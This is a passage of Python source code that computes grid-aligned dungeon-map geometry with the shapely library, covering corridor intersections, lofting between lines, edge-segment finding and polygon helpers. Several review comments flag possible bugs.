        else:
            raise RuntimeError("Unexpected angle between {0} and {1}?!"
                               .format(base_dir, exit_dir))
    new_exits = {}
    if exit_fwd:
        # Forward continuation: sweep far enough ahead to make room for any
        # diagonal exits that share the corridor.
        sweep_dist = exit_width
        if ((not base_dir.is_cardinal()) and
            (base_dir.rotate(45) in exit_dir_list or
             base_dir.rotate(-45) in exit_dir_list or
             base_dir.rotate(135) in exit_dir_list or
             base_dir.rotate(-135) in exit_dir_list)):
            sweep_dist *= 2
        if ((base_dir.rotate(135) in exit_dir_list and
             base_dir.rotate(-45) in exit_dir_list) or
            (base_dir.rotate(-135) in exit_dir_list and
             base_dir.rotate(45) in exit_dir_list)):
            sweep_dist += base_width
        (_, new_exits[exit_fwd]) = sweep(base_line, base_dir, sweep_dist)
    exit_fwd_adjust = False
    # 135-degree (sharply backward) exits, on each side.
    for s in [1, -1]:
        exit_135 = base_dir.rotate(135 * s)
        if not exit_135 in exit_dir_list:
            continue
        (shared_point, _) = endpoints_by_direction(base_line, exit_135)
        exit_line = point_sweep(shared_point, base_dir.rotate(45*s), exit_width)
        if not grid_aligned(exit_line, exit_135):
            # Nudge forward one grid square to restore alignment.
            new_exit_line = translate(exit_line, base_dir, 10)
            assert grid_aligned(new_exit_line, exit_135), \
                ("Even after adjusting from {0}, {1} is not grid-aligned to {2}"
                 .format(to_string(exit_line), to_string(new_exit_line),
                         exit_135))
            exit_line = new_exit_line
            exit_fwd_adjust = True
        new_exits[exit_135] = exit_line
    # 90-degree (side) exits.
    for s in [1, -1]:
        exit_90 = base_dir.rotate(90 * s)
        if not exit_90 in exit_dir_list:
            continue
        (shared_point, _) = endpoints_by_direction(base_line, exit_90)
        exit_line = point_sweep(shared_point, base_dir, exit_width)
        new_exits[exit_90] = exit_line
    for s in [1, -1]:
        exit_45 = base_dir.rotate(45 * s)
        if not exit_45 in exit_dir_list:
            continue
        # 45-degree exits are the trickiest.
        # We have a number of cases to consider:
        # 1) 45-degree side passage (main continues)
        #    Here we must not cross the same base wall
        # 2) Y-junction (45 degree split in both directions)
        #    Here we must not cross the base midline
        # 3) Simple 45-degree turn (no other exits forward)
        #    Here we must not cross the opposite base wall
        # 4) X-junction
        #    As in case 1/2/3, but must align with opposite 135-degree exit
        (shared_point, other_point) = endpoints_by_direction(base_line, exit_45)
        if base_dir in exit_dir_list:
            # Case 1. Make way!
            base_point = translate(shared_point, exit_45, exit_width)
        elif base_dir.rotate(-45 * s) in exit_dir_list:
            # Case 2.
            if ((base_dir.is_cardinal() and base_width >= exit_width) or
                (exit_45.is_cardinal() and base_width >= 2 * exit_width)):
                base_point = shared_point
            elif base_dir.is_cardinal():
                base_point = translate(shared_point, exit_45,
                                       (exit_width - base_width))
            elif exit_45.is_cardinal():
                base_point = translate(shared_point, exit_45,
                                       round(exit_width - (base_width/2), -1))
        else:
            # Case 3
            base_point = shared_point
            if exit_45.is_cardinal() and exit_width > base_width:
                base_point = translate(base_point, exit_45,
                                       (exit_width - base_width))
            elif base_dir.is_cardinal() and exit_width > 2 * base_width:
                base_point = translate(base_point, exit_45,
                                       (exit_width - 2 * base_width))
            elif base_dir.is_cardinal() and exit_width < base_width:
                base_point = translate(base_point, base_dir,
                                       (base_width - exit_width))
            elif exit_45.is_cardinal() and 2 * exit_width < base_width:
                base_point = translate(base_point, base_dir,
                                       (base_width - (2* exit_width)))
        exit_line = point_sweep(base_point, base_dir.rotate(-45 * s),
                                exit_width)
        if base_dir.rotate(-135 * s) in exit_dir_list:
            # Case 4
            exit_line = translate(exit_line, base_dir, base_width)
            pass
        if not grid_aligned(exit_line, exit_45):
            # Nudge forward one grid square to restore alignment.
            new_exit_line = translate(exit_line, base_dir, 10)
            assert grid_aligned(new_exit_line, exit_45), \
                ("Even after adjusting from {0}, {1} is not grid-aligned to {2}"
                 .format(to_string(exit_line), to_string(new_exit_line),
                         exit_45))
            exit_line = new_exit_line
            exit_fwd_adjust = True
        new_exits[exit_45] = exit_line
        continue
    if exit_fwd and exit_fwd_adjust:
        # Keep the forward exit flush with any nudged diagonal exits.
        new_exits[exit_fwd] = translate(new_exits[exit_fwd], base_dir, 10)
    # Construct the polygon describing the intersection between these exits.
    (first_point, last_point) = endpoints_by_direction(base_line,
                                                       base_dir.rotate(-90))
    prev_dir = base_dir.rotate(180)
    points = [last_point, first_point]
    skip_count = 0
    # Walk the exits counterclockwise, stitching their endpoints together.
    for dir in [base_dir.rotate(-135), base_dir.rotate(-90),
                base_dir.rotate(-45), base_dir, base_dir.rotate(45),
                base_dir.rotate(90), base_dir.rotate(135)]:
        if not dir in exit_dir_list:
            skip_count += 1
            continue
        elif skip_count < 3:
            (p1, p2) = endpoints_by_direction(new_exits[dir], prev_dir)
        elif skip_count < 5:
            (p1, p2) = endpoints_by_direction(new_exits[dir],
                                              prev_dir.rotate(90))
        else:
            (p1, p2) = endpoints_by_direction(new_exits[dir],
                                              prev_dir.rotate(180))
        if dir != prev_dir.rotate(180):
            points += intersection_interpolate(points[-1], p1, prev_dir, dir,
                                               points)
        points += [p1, p2]
        prev_dir = dir
        skip_count = 0
    if base_dir.rotate(180) != prev_dir.rotate(180):
        points += intersection_interpolate(points[-1], last_point, prev_dir,
                                           base_dir.rotate(180), points)
    points += [last_point]
    new_polygon = polygon(points)
    log.debug("exits: {0}, new_polygon: {1}"
              .format(exit_dir_list, to_string(new_polygon)))
    return (new_polygon, new_exits)
def intersection_interpolate(p0, p1, d0, d1, points_so_far):
    """Helper function for construct_intersection().

    Find the point where the two exit edges would meet if each were
    extended backwards, and return it as a single-element list suitable
    for insertion into the polygon under construction. Returns an empty
    list if no such point exists, or if adding it would make the
    polygon self-intersecting or redundant.
    """
    ray_0 = point_sweep(p0, d0.rotate(180), 500)
    ray_1 = point_sweep(p1, d1.rotate(180), 500)
    candidate = intersect(ray_0, ray_1)
    if candidate.is_empty:
        log.error("Unable to construct intersection between exit segments")
        return []
    assert isinstance(candidate, Point), \
        "intersection {0} is not a Point".format(to_string(candidate))
    # Avoid self-intersection and redundant points
    if (line(points_so_far).contains(candidate) or
            candidate.equals(p0) or candidate.equals(p1) or
            (len(points_so_far) > 2 and
             line(points_so_far[:-1]).crosses(line(p0, candidate)))):
        log.warning("Not adding point {0} as it would self-intersect"
                    .format(to_string(candidate)))
        return []
    return [candidate]
def cardinal_to_diagonal(base_line, new_orientation):
    """Convert a cardinal line segment of length X to a diagonal line of
    length sqrt(2)/2 * x.

    base_line: the cardinal segment to convert (anything line() accepts).
    new_orientation: the diagonal Direction the new segment should face.
    Returns the new diagonal line segment.
    """
    assert isinstance(new_orientation, Direction)
    base_line = line(base_line)
    base_dir = Direction.normal_to(base_line)
    # Flip the normal if it points away from the requested orientation.
    if base_dir.angle_from(new_orientation) > 90:
        base_dir = base_dir.rotate(180)
    assert base_dir.is_cardinal() and not new_orientation.is_cardinal()
    log.debug("Changing base line {0} from {1} to {2}"
              .format(to_string(base_line), base_dir, new_orientation))
    (x0, y0, x1, y1) = base_line.bounds
    # Find the endpoint the new line shares with the base line
    if new_orientation.vector[0] > 0:
        xa = x1
    else:
        xa = x0
    if new_orientation.vector[1] > 0:
        ya = y1
    else:
        ya = y0
    log.debug("shared point: {0}, {1}".format(xa, ya))
    # Construct the new endpoint
    # NOTE(review): xb/yb are computed purely from the bounding-box
    # extents (x1 - x0, y1 - y0) and are never offset by x0/y0 or by the
    # shared point -- this looks like it assumes the base line is
    # anchored at the origin. Verify against callers.
    xb = (x1 - x0)/2 + (base_dir.vector[0] * (y1 - y0)/2)
    yb = (y1 - y0)/2 + (base_dir.vector[1] * (x1 - x0)/2)
    log.debug("new point: {0}, {1}".format(xb, yb))
    new_line = line((xa, ya), (xb, yb))
    log.debug("new line is {0}".format(to_string(new_line)))
    return new_line
def diagonal_to_cardinal(base_line, new_orientation):
    """Convert a diagonal line of length sqrt(2)/2 * X to a cardinal line
    of length X.

    base_line: the diagonal segment to convert (anything line() accepts).
    new_orientation: the cardinal Direction the new segment should face.
    Returns the new cardinal line segment, with its first endpoint
    snapped outward to the 10' grid.
    """
    assert isinstance(new_orientation, Direction)
    base_line = line(base_line)
    base_dir = Direction.normal_to(base_line)
    # Flip the normal if it points away from the requested orientation.
    if base_dir.angle_from(new_orientation) > 90:
        base_dir = base_dir.rotate(180)
    assert not base_dir.is_cardinal() and new_orientation.is_cardinal()
    log.debug("Changing base line {0} from {1} to {2}"
              .format(to_string(base_line), base_dir, new_orientation))
    (x0, y0, x1, y1) = base_line.bounds
    # Construct the first endpoint, rounding away from the shape
    # (ceil/floor chosen by which way the normal and orientation point).
    if base_dir.vector[0] > 0:
        if new_orientation.vector[0] > 0:
            xa = math.ceil(x1/10) * 10
        else:
            xa = math.ceil(x0/10) * 10
    else:
        if new_orientation.vector[0] < 0:
            xa = math.floor(x0/10) * 10
        else:
            xa = math.floor(x1/10) * 10
    if base_dir.vector[1] > 0:
        if new_orientation.vector[1] > 0:
            ya = math.ceil(y1/10) * 10
        else:
            ya = math.ceil(y0/10) * 10
    else:
        if new_orientation.vector[1] < 0:
            ya = math.floor(y0/10) * 10
        else:
            ya = math.floor(y1/10) * 10
    log.debug("first point: {0}, {1}".format(xa, ya))
    # Construct the second endpoint. A 45-degree diagonal's bounding box
    # is square, so doubling either extent gives the new cardinal length.
    # (Removed an unused 'new_width = 2 * (x1 - x0)' local that merely
    # duplicated this value and was never read.)
    # NOTE(review): the x offset uses the orientation's y-component and
    # vice versa -- this looks transposed; verify against Direction's
    # vector convention before relying on it.
    xb = xa + new_orientation.vector[1] * (2 * (y1 - y0))
    yb = ya + new_orientation.vector[0] * (2 * (x1 - x0))
    log.debug("second point: {0}, {1}".format(xb, yb))
    new_line = line((xa, ya), (xb, yb))
    log.info("new line is {0}".format(to_string(new_line)))
    return new_line
def endpoints_by_direction(line, dir):
    """Order the two endpoints of *line* relative to *dir*.

    Returns the endpoint pair ordered by their projection onto the
    direction vector; raises RuntimeError if the two endpoints project
    identically (no way to choose between them).
    """
    (end_a, end_b) = list(line.boundary)
    # Project the endpoint difference vector onto the direction vector.
    delta = ((end_a.x - end_b.x) * dir.vector[0] +
             (end_a.y - end_b.y) * dir.vector[1])
    if delta == 0:
        raise RuntimeError("Unable to decide between {0} and {1} to the {2}"
                           .format(to_string(end_a), to_string(end_b), dir))
    return (end_a, end_b) if delta > 0 else (end_b, end_a)
def point_sweep(point, dx_or_dir, dy_or_dist):
    """Construct the line segment swept out by moving *point*.

    The displacement may be expressed either as (dx, dy) offsets or as
    a (Direction, distance) pair -- whatever translate() accepts.
    Returns the line segment between the original and moved points.
    """
    moved = translate(point, dx_or_dir, dy_or_dist)
    return line(point, moved)
def sweep(base_line, dir, distance, base_dir=None, width=None):
    """Sweep the given line in the given direction for the given distance.

    Returns the tuple (polygon, new_line) where polygon is the region
    covered by the swept line and new_line is its final position.
    The base_dir and width parameters are accepted for interface
    compatibility but are not referenced in the body.
    """
    assert isinstance(dir, Direction)
    # base_line may be a LineString or simply a list of coords.
    start_line = line(base_line)
    end_line = translate(start_line, dir, distance)
    swept_poly = loft(start_line, end_line)
    log.debug("Swept polygon from {0} to the {1} by {2}: {3}"
              .format(to_string(start_line), dir, distance,
                      to_string(swept_poly)))
    return (swept_poly, end_line)
def loft(*args):
    """Construct a polygon by "skinning" between linear cross-sections.

    Takes two or more line segments; each consecutive pair is joined
    into a polygon and all the resulting pieces are unioned together.
     ----      ----_
    /         /     -_
         ---> \       -
      -----    \  -----
     /          \/
    Returns the (cascaded) union of the per-pair polygons.
    """
    lines = list(args)
    line1 = lines.pop(0)
    assert line1.length > 0
    polys = []
    while len(lines) > 0:
        line2 = lines.pop(0)
        assert line2.length > 0
        log.debug("Constructing a polygon between {0} and {1}"
                  .format(to_string(line1), to_string(line2)))
        poly = None
        # Degenerate cases first
        if line1.crosses(line2):
            log.warning("trying to loft but line1 {0} crosses line2 {1} at {2}"
                        .format(to_string(line1), to_string(line2),
                                to_string(line1.intersection(line2))))
            # NOTE(review): this comment said "fallthru to default case at
            # end", but the convex-hull fallback below sits inside the
            # final 'else' branch, so a crossing pair produces no polygon
            # at all (poly stays None and is skipped). Verify intent.
        elif line1.contains(line2):
            # One line lies entirely on the other: nothing to skin.
            poly = line1
        elif line2.contains(line1):
            poly = line2
        elif line1.boundary.intersects(line2.boundary):
            log.debug("The two lines share an endpoint - merging them")
            poly1 = Polygon(shapely.ops.linemerge([line1, line2]))
            if poly1.is_valid:
                poly = poly1
            else:
                log.warning("line1 and line2 share an endpoint but "
                            "cannot be merged: {0}"
                            .format(shapely.validation.explain_validity(poly1)))
        else:
            # The lines do not touch, so we can just skin between them:
            # try pairing the endpoints both ways and keep whichever
            # pairing does not cross itself and yields a valid polygon.
            if poly is None and (not line(line1.boundary[0], line2.boundary[0])
                                 .crosses(line(line1.boundary[1],
                                               line2.boundary[1]))):
                poly1 = (Polygon(list(line1.coords) +
                                 list(reversed(line2.coords))))
                if poly1.is_valid:
                    poly = poly1
            if poly is None and (not line(line1.boundary[0], line2.boundary[1])
                                 .crosses(line(line1.boundary[1],
                                               line2.boundary[0]))):
                poly1 = (Polygon(list(line1.coords) +
                                 list(line2.coords)))
                if poly1.is_valid:
                    poly = poly1
            # Last resort: the convex hull of both lines.
            if poly is None:
                log.warning("Unable to loft intuitively between {0} and {1}"
                            .format(to_string(line1), to_string(line2)))
                poly1 = union(line1, line2).convex_hull
                if poly1.is_valid:
                    poly = poly1
        log.debug("Constructed {0}".format(to_string(poly)))
        if poly is not None:
            polys.append(poly)
        # Chain: the second line becomes the first of the next pair.
        line1 = line2
    return shapely.ops.cascaded_union(polys)
def loft_to_grid(base_line, dir, width):
    """Construct the shape needed to connect the given line to the
    appropriate grid points in the given direction.

    Returns the tuple (aligned_line, lofted_polygon). When more than one
    plausible alignment exists, the one whose lofted polygon has the
    least area wins (total perimeter is the tie-breaker).
    """
    assert isinstance(dir, Direction)
    base_line = line(base_line)
    log.info("Lofting {0} to the {1} to align to the grid"
             .format(to_string(base_line), dir))
    # (Removed a dead '(p1, p2) = base_line.boundary' unpack here -- the
    # values were unconditionally overwritten a few lines below.)
    # Cardinal alignments snap to the 10' grid, diagonal ones to 5'.
    if dir.is_cardinal():
        divisor = 10
    else:
        divisor = 5
    (p1, p2) = endpoints_by_direction(base_line, dir.rotate(90))
    # Snap each endpoint to the grid, rounding in the travel direction.
    if dir.vector[0] < 0:
        x1 = math.floor(p1.x / divisor) * divisor
        x2 = math.floor(p2.x / divisor) * divisor
    elif dir.vector[0] > 0:
        x1 = math.ceil(p1.x / divisor) * divisor
        x2 = math.ceil(p2.x / divisor) * divisor
    else:
        x1 = round(p1.x / divisor) * divisor
        x2 = round(p2.x / divisor) * divisor
    if dir.vector[1] < 0:
        y1 = math.floor(p1.y / divisor) * divisor
        y2 = math.floor(p2.y / divisor) * divisor
    elif dir.vector[1] > 0:
        y1 = math.ceil(p1.y / divisor) * divisor
        y2 = math.ceil(p2.y / divisor) * divisor
    else:
        y1 = round(p1.y / divisor) * divisor
        y2 = round(p2.y / divisor) * divisor
    p1 = point(x1, y1)
    p2 = point(x2, y2)
    # Two candidate aligned lines, one swept from each snapped endpoint.
    candidate_1 = point_sweep(p1, dir.rotate(-90), width)
    candidate_2 = point_sweep(p2, dir.rotate(90), width)
    # TODO - intermediate possibilities?
    # Nudge each candidate forward until it is fully clear of base_line.
    while (sweep(candidate_1, dir, 50)[0].crosses(base_line) or
           sweep(candidate_1, dir, 50)[0].contains(base_line)):
        candidate_1 = translate(candidate_1, dir, 10)
    while (sweep(candidate_2, dir, 50)[0].crosses(base_line) or
           sweep(candidate_2, dir, 50)[0].contains(base_line)):
        candidate_2 = translate(candidate_2, dir, 10)
    poly1 = loft(base_line, candidate_1)
    poly2 = loft(base_line, candidate_2)
    log.debug("First candidate: {0}, {1}"
              .format(to_string(candidate_1), poly1.area))
    log.debug("Second candidate: {0}, {1}"
              .format(to_string(candidate_2), poly2.area))
    # Prefer the smaller lofted area; break ties on perimeter length.
    if (poly1.area < poly2.area or (poly1.area == poly2.area and
                                    poly1.length < poly2.length)):
        candidate_line = candidate_1
        poly = poly1
    else:
        candidate_line = candidate_2
        poly = poly2
    log.info("New line is {0}".format(to_string(candidate_line)))
    return (candidate_line, poly)
def find_edge_segments(poly, width, direction):
    """Find grid-constrained line segments along the border of the given polygon
    in the given direction with the given width.

    A probe box of the requested width is swept across the polygon in
    10' steps; at each step the border sections inside the box are
    minimized to the requested width and the best-placed one (per the
    direction-specific 'prefer' rule) is kept if it passes check_size().
    Returns a list of zero or more line segments.
    """
    log.info("Finding line segments (width {0}) along the {1} edge of {2}"
             .format(width, direction, to_string(poly)))
    assert isinstance(direction, Direction)
    border = line_loop(poly.exterior.coords)
    (xmin, ymin, xmax, ymax) = poly.bounds
    # Each direction family sets up: the initial probe box (inter_box),
    # the sweep direction (offset), and three closures -- check_width
    # (is a section at least wide enough?), check_size (does the final
    # candidate match the requested width without being oversized?) and
    # prefer (which of two candidate sections is better placed?).
    if direction == Direction.N or direction == Direction.S:
        inter_box = box(math.floor(xmin/10)*10, ymin - 10,
                        math.floor(xmin/10)*10 + width, ymax + 10)
        offset = Direction.E
        def check_width(intersection):
            w = intersection.bounds[2] - intersection.bounds[0]
            return w >= width
        def check_size(intersection, size):
            # Make sure width matches "size" and height not too much
            w = intersection.bounds[2] - intersection.bounds[0]
            h = intersection.bounds[3] - intersection.bounds[1]
            return (math.fabs(w - size) < 0.1 and h < size)
        if direction[1] > 0: #north
            def prefer(option_a, option_b):
                return (option_a.bounds[3] > option_b.bounds[3] or (
                    option_a.bounds[3] == option_b.bounds[3] and
                    option_a.bounds[1] > option_b.bounds[1]))
        else: # south
            def prefer(option_a, option_b):
                return (option_a.bounds[1] < option_b.bounds[1] or (
                    option_a.bounds[1] == option_b.bounds[1] and
                    option_a.bounds[3] < option_b.bounds[3]))
    elif direction == Direction.W or direction == Direction.E:
        inter_box = box(xmin - 10, math.floor(ymin/10)*10,
                        xmax + 10, math.floor(ymin/10)*10 + width)
        offset = Direction.N
        def check_width(intersection):
            h = intersection.bounds[3] - intersection.bounds[1]
            return h >= width
        def check_size(intersection, size):
            # Make sure height matches "size" and width not too much
            w = intersection.bounds[2] - intersection.bounds[0]
            h = intersection.bounds[3] - intersection.bounds[1]
            return (math.fabs(h - size) < 0.1 and w < size)
        if direction[0] < 0: #west
            def prefer(option_a, option_b):
                return (option_a.bounds[0] < option_b.bounds[0] or (
                    option_a.bounds[0] == option_b.bounds[0] and
                    option_a.bounds[2] < option_b.bounds[2]))
        else: # east
            def prefer(option_a, option_b):
                return (option_a.bounds[2] > option_b.bounds[2] or (
                    option_a.bounds[2] == option_b.bounds[2] and
                    option_a.bounds[0] > option_b.bounds[0]))
    elif direction == Direction.NW or direction == Direction.SE:
        # Diagonal case: build the probe box by intersecting long
        # diagonal rays cast from grid-snapped corners of the bounds.
        line1 = point_sweep(point(math.floor(xmin/10) * 10,
                                  math.ceil(ymax/10) * 10), Direction.NE, 2000)
        line2 = point_sweep(point(math.ceil(xmax/10) *10,
                                  math.floor(ymin/10) * 10), Direction.NE, 2000)
        line3 = point_sweep(point(math.ceil(xmax/10) * 10,
                                  math.ceil(ymax/10) * 10), Direction.NW, 2000)
        line4 = point_sweep(point(math.ceil(xmax/10) * 10,
                                  math.ceil(ymax/10) * 10), Direction.SE, 2000)
        point1 = intersect(line1, line3)
        if not isinstance(point1, Point):
            raise RuntimeError("Intersection of {0} and {1} is {2}, not a Point"
                               .format(to_string(line1), to_string(line3),
                                       point1))
        point2 = intersect(line2, line4)
        if not isinstance(point2, Point):
            raise RuntimeError("Intersection of {0} and {1} is {2}, not a Point"
                               .format(to_string(line2), to_string(line4),
                                       point2))
        point3 = translate(point2, Direction.SW, width)
        point4 = translate(point1, Direction.SW, width)
        inter_box = polygon([point1, point2, point3, point4])
        log.debug("inter_box: {0}".format(to_string(inter_box)))
        offset = Direction.SW
        def check_width(intersection):
            # Diagonal extent approximated as the sum of the bbox sides.
            l = ((intersection.bounds[2] - intersection.bounds[0]) +
                 (intersection.bounds[3] - intersection.bounds[1]))
            return l >= width
        def check_size(intersection, size):
            w = intersection.bounds[2] - intersection.bounds[0]
            h = intersection.bounds[3] - intersection.bounds[1]
            return (h > 0 and w > 0 and math.fabs(w + h - size) < 0.1)
        if direction[1] > 0: #north
            def prefer(option_a, option_b):
                return (option_a.bounds[1] > option_b.bounds[1] or (
                    option_a.bounds[1] == option_b.bounds[1] and
                    option_a.bounds[3] > option_b.bounds[3]))
        else: # south
            def prefer(option_a, option_b):
                return (option_a.bounds[3] < option_b.bounds[3] or (
                    option_a.bounds[3] == option_b.bounds[3] and
                    option_a.bounds[1] < option_b.bounds[1]))
    elif direction == Direction.NE or direction == Direction.SW:
        line1 = point_sweep(point(math.floor(xmin/10) * 10,
                                  math.floor(ymin/10) * 10), Direction.NW, 2000)
        line2 = point_sweep(point(math.ceil(xmax/10) * 10,
                                  math.ceil(ymax/10) * 10), Direction.NW, 2000)
        line3 = point_sweep(point(math.floor(xmin/10) * 10,
                                  math.ceil(ymax/10) * 10), Direction.SW, 2000)
        line4 = point_sweep(point(math.floor(xmin/10) * 10,
                                  math.ceil(ymax/10) * 10), Direction.NE, 2000)
        point1 = intersect(line1, line3)
        if not isinstance(point1, Point):
            raise RuntimeError("Intersection of {0} and {1} is {2}, not a Point"
                               .format(to_string(line1), to_string(line3),
                                       point1))
        point2 = intersect(line2, line4)
        if not isinstance(point2, Point):
            raise RuntimeError("Intersection of {0} and {1} is {2}, not a Point"
                               .format(to_string(line2), to_string(line4),
                                       point2))
        point3 = translate(point2, Direction.SE, width)
        point4 = translate(point1, Direction.SE, width)
        inter_box = polygon([point1, point2, point3, point4])
        log.debug("inter_box: {0}".format(to_string(inter_box)))
        offset = Direction.SE
        def check_width(intersection):
            l = ((intersection.bounds[2] - intersection.bounds[0]) +
                 (intersection.bounds[3] - intersection.bounds[1]))
            return l >= width
        def check_size(intersection, size):
            w = intersection.bounds[2] - intersection.bounds[0]
            h = intersection.bounds[3] - intersection.bounds[1]
            return (h > 0 and w > 0 and math.fabs(w + h - size) < 0.1)
        if direction[1] > 0: #north
            def prefer(option_a, option_b):
                return (option_a.bounds[1] > option_b.bounds[1] or (
                    option_a.bounds[1] == option_b.bounds[1] and
                    option_a.bounds[3] > option_b.bounds[3]))
        else: # south
            def prefer(option_a, option_b):
                return (option_a.bounds[3] < option_b.bounds[3] or (
                    option_a.bounds[3] == option_b.bounds[3] and
                    option_a.bounds[1] < option_b.bounds[1]))
    log.debug("box: {0}, offset: {1}".format(to_string(inter_box), offset))
    candidates = []
    # Degenerate case: the probe box swallows the whole polygon.
    if (inter_box.contains(poly) and not inter_box.equals(poly) and
        not hasattr(inter_box.difference(poly), "geoms")):
        log.warning("Box {0} contains poly {1}!"
                    .format(to_string(inter_box), to_string(poly)))
        return candidates
    first_hit = False
    # Sweep the probe box across the polygon in 10' increments.
    while True:
        intersection = intersect(inter_box, border)
        log.debug("intersection: {0}".format(to_string(intersection)))
        if intersection.length == 0:
            if not first_hit:
                # We're not there yet - just move closer
                inter_box = translate(inter_box, offset, 10)
                continue
            else:
                # We've crossed the shape and exited the other side
                break
        best = None
        first_hit = True
        diff = differ(inter_box, poly)
        if not hasattr(diff, "geoms"):
            # The box does not fully straddle the polygon yet.
            log.info("Not a complete intersection? {0}"
                     .format(to_string(diff)))
            inter_box = translate(inter_box, offset, 10)
            continue
        if not hasattr(intersection, "geoms"):
            intersection = [intersection]
        # Trim each border section down to the minimal span(s) that are
        # still at least 'width' across.
        segments = []
        for segment in intersection:
            segments += minimize_line(segment, check_width)
        intersection = segments
        log.debug("Intersection: {0}"
                  .format([to_string(x) for x in intersection]))
        for linestring in intersection:
            if best is None or prefer(linestring, best):
                if best is not None:
                    log.info("Preferring {0} over {1}"
                             .format(to_string(linestring),
                                     to_string(best)))
                best = linestring
        inter_box = translate(inter_box, offset, 10)
        if best is None:
            log.debug("No valid candidate found")
            continue
        elif not check_size(best, width):
            log.debug("Best-fit {0} failed check_size() check against {1}"
                      .format(to_string(best), width))
            continue
        log.info("Found section: {0}".format(to_string(best)))
        candidates.append(best)
    log.info("Found {0} candidate edges: {1}"
             .format(len(candidates), [to_string(c) for c in candidates]))
    return candidates
def trim(shape, trimmer, adjacent_shape):
    """Trim 'shape' until it no longer overlaps 'trimmer'.

    If subtracting 'trimmer' fragments the shape into several pieces,
    only the piece (if any) that still touches 'adjacent_shape' is
    kept. Returns the surviving (simplified) polygon, or None when
    nothing suitable remains.
    """
    if not (isinstance(shape, Polygon) or
            isinstance(shape, MultiPolygon) or
            isinstance(shape, GeometryCollection)):
        raise TypeError("shape is {0}".format(type(shape)))
    log.debug("Trimming {0} with {1}, adjacent to {2}"
              .format(to_string(shape), to_string(trimmer),
                      to_string(adjacent_shape)))
    difference = differ(shape, trimmer)
    log.debug("Difference is {0}".format(to_string(difference)))
    match = None
    # Handle the case where the polygon was split by existing geometry.
    if (type(difference) is GeometryCollection or
            type(difference) is MultiPolygon):
        log.debug("Trimming shape split it into {0} pieces"
                  .format(len(difference.geoms)))
        for piece in difference.geoms:
            if type(piece) is Polygon and piece.intersects(adjacent_shape):
                match = piece
                break
    elif type(difference) is Polygon:
        if difference.intersects(adjacent_shape):
            match = difference
        else:
            log.warning("{0} does not intersect {1}"
                        .format(to_string(difference),
                                to_string(adjacent_shape)))
    if match is None:
        log.debug("After trimming, shape is nonexistent")
        return match
    log.debug("Trimmed shape to fit")
    if match.area > 0:
        match = match.simplify(0)
        # TODO? force all coordinates in match to snap to 1' grid
    return match
def minimize_line(base_line, validator):
    """Trim the given line from both ends down to the minimal sub-line(s)
    that still satisfy the given validator function.

    If base_line itself fails the validator it is returned unchanged as
    a single-element list. Otherwise coordinates are stripped greedily
    from each end, in both possible orders; the two results may coincide
    (one minimal line) or differ (two minimal lines). For example, a
    validator enforcing a minimum width keeps a horizontal run, while
    one enforcing a minimum height keeps a vertical run.
    """
    if not validator(base_line):
        log.info("Base line {0} does not satisfy validator"
                 .format(to_string(base_line)))
        return [base_line]

    def shrink(coords, from_end):
        # Drop coordinates from one end while the validator still passes.
        while len(coords) > 2:
            trimmed = coords[:-1] if from_end else coords[1:]
            if not validator(line(trimmed)):
                break
            coords = trimmed
        return coords

    # First candidate: strip from the end, then from the beginning.
    line1 = line(shrink(shrink(list(base_line.coords), True), False))
    # Second candidate: strip from the beginning, then from the end.
    line2 = line(shrink(shrink(list(base_line.coords), False), True))
    if line1.equals(line2):
        if line1.equals(base_line):
            log.debug("Line {0} cannot be minimized any further"
                      .format(to_string(base_line)))
            return [base_line]
        log.debug("Minimized line {0} to {1}"
                  .format(to_string(base_line), to_string(line1)))
        return [line1]
    log.debug("Minimized line {0} to {1} and {2}"
              .format(to_string(base_line), to_string(line1),
                      to_string(line2)))
    return [line1, line2]
# Polygon construction functions
def point(x, y):
    """Wrap the given (x, y) coordinates in a Point."""
    return Point(x, y)
def line(*coords):
    """Construct a line segment (LineString).

    Accepts an existing LineString, a sequence of Points, or a sequence
    of (x, y) tuples -- given either as separate arguments or as a
    single iterable. Raises RuntimeError for inputs it cannot interpret
    and asserts that the result is a valid geometry.
    """
    if len(coords) == 1:
        coords = coords[0]
    if isinstance(coords, LineString):
        result = coords
    elif len(coords) > 0:
        if isinstance(coords[0], Point):
            # Unpack Point objects into plain coordinate tuples.
            coords = [(p.x, p.y) for p in coords]
        result = LineString(coords)
    else:
        raise RuntimeError("Don't know how to construct a line segment from {0}"
                           .format(coords))
    assert result.is_valid, ("{0} does not yield a valid line: {1}"
                             .format(to_string(coords),
                                     shapely.validation.explain_validity(result)))
    return result
def line_loop(coords):
    """Construct a closed linear loop (LinearRing) from the given
    coordinate sequence, implicitly connecting the end back to the
    start if needed.

    Asserts that the result is a valid (non-self-intersecting) ring.
    """
    loop = LinearRing(coords)
    # BUG FIX: the assertion message previously referenced the undefined
    # name 'Coords' (capital C), so an invalid loop raised NameError
    # instead of the intended AssertionError with a useful message.
    assert loop.is_valid, ("{0} does not yield a valid line: {1}"
                           .format(to_string(coords),
                                   shapely.validation.explain_validity(loop)))
    return loop
def polygon(coords=None):
    """Construct a Polygon.

    Accepts None (yields an empty polygon), an existing Polygon
    (returned as-is), or a list of Points or (x, y) tuples. Raises
    RuntimeError for anything else and asserts that the result is a
    valid geometry.
    """
    if coords is None:
        poly = Polygon()
    elif isinstance(coords, Polygon):
        poly = coords
    elif type(coords) is list:
        if isinstance(coords[0], Point):
            # Unpack Point objects into plain coordinate tuples.
            coords = [(p.x, p.y) for p in coords]
        poly = Polygon(coords)
    else:
        raise RuntimeError("Not sure how to create Polygon from {0}"
                           .format(coords))
    assert poly.is_valid, ("{0} does not yield a valid polygon: {1}"
                           .format(to_string(coords),
                                   shapely.validation.explain_validity(poly)))
    return poly
def lines_to_coords(lines):
    """Convert a LineString or MultiLineString into a list of coordinate
    lists (one inner list per underlying line segment).

    An empty geometry yields an empty list; any other geometry type is
    rejected with a RuntimeError.
    """
    if lines.is_empty:
        log.info("No points in lines {0}".format(to_string(lines)))
        coords_list = []
    elif isinstance(lines, LineString):
        coords_list = [list(lines.coords)]
    elif isinstance(lines, MultiLineString):
        coords_list = [list(geom.coords) for geom in lines.geoms]
    else:
        raise RuntimeError("Unexpected shape {0}".format(to_string(lines)))
    log.debug("{0} has coords: {1}".format(to_string(lines), coords_list))
    return coords_list
def box(xmin, ymin, xmax, ymax):
    """Construct an axis-aligned rectangle spanning the given bounds."""
    return shapely.geometry.box(xmin, ymin, xmax, ymax)
def rectangle_list(width, height):
    """Return the grid-aligned rectangle(s) with the given dimensions:
    both orientations for a true rectangle, just one for a square.
    """
